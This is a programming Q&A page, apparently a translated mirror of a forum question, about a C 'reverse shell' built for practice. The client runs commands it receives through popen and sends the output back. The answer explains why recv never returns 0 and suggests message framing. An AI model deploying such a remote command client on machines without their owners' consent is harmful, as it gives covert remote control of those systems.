C recv函数阻止循环从接收到所有内容(sys / socket)后重复进行

问题描述 投票:0回答:1

我正在使用反向外壳程序(用于实践),并且试图将popen函数的输出发送回服务器。出于某种原因,当我循环浏览并发送文件时,(server recv)循环在停止接收消息时不会中断。谁能找到我的错误。帮我解决这个问题?服务器代码:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>

#define PORT 4583


int main(){

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in server;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(PORT);
    server.sin_family = AF_INET;
    bind(sock, (struct sockaddr *) &server, sizeof(server));
    listen(sock, 2);
    int client = accept(sock, NULL, NULL);
    char * command = (char *) malloc(75);
    char * output = (char * ) malloc (5000);
    ssize_t size;
    while (1){
        printf(">> ");
        fgets(command, 75, stdin);
        send(client, command, strlen(command), 0);
        while((size = recv(client, output, 5000, 0)) != 0){
            printf("%s", output);
            if (size == 0){
                break;
            }
        }
        printf("Done");
    }
    free(command);
    free(output);
    return 0;
}

客户端代码:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 4583

int main(){

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in server;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(PORT);
    server.sin_family = AF_INET;
    connect(sock, (struct sockaddr *) &server, sizeof(server));

    char* command = (char *) malloc(75);
    int commandlen;
    char* output = (char *) malloc (5000);
    while (1){
        recv(sock, command, 75, 0);
        commandlen = strlen(command);
        if (*command == 'c' && *command+1 == 'd'){
            command[commandlen-1] = '\0';
            int stat = chdir(command+3);
            if (stat != 0){
                output = strerror(errno);
                send(sock, output, 5000, 0);
            } else {
                send(sock, 0, 0, 0);
            }
        } else{
            FILE * cmd = popen(command, "r");
            while (fgets(output, 5000, cmd) != NULL){
                send(sock, output, 5000, 0);
            }
            pclose(cmd);
        }
    }
    free(output);
    free(command);

    return 0;
}
c sockets tcp recv reverse-shell
1个回答
1
投票
    while((size = recv(client, output, 5000, 0)) != 0){

您的期望是,当客户端“完成”时,recv返回0。但是从TCP的角度来看,唯一的“完成”是TCP连接关闭并且只有recv会返回0。只有,您的客户端不会在处理命令后关闭连接,而是期望下一条命令。

为了解决此问题,您需要在TCP之上实现一些消息协议,以便您知道何时实际完成命令输出。通常的方法是给每个消息加上前缀长度,或者给每个消息添加一些唯一的消息结束字节序列。]

© www.soinside.com 2019 - 2024. All rights reserved.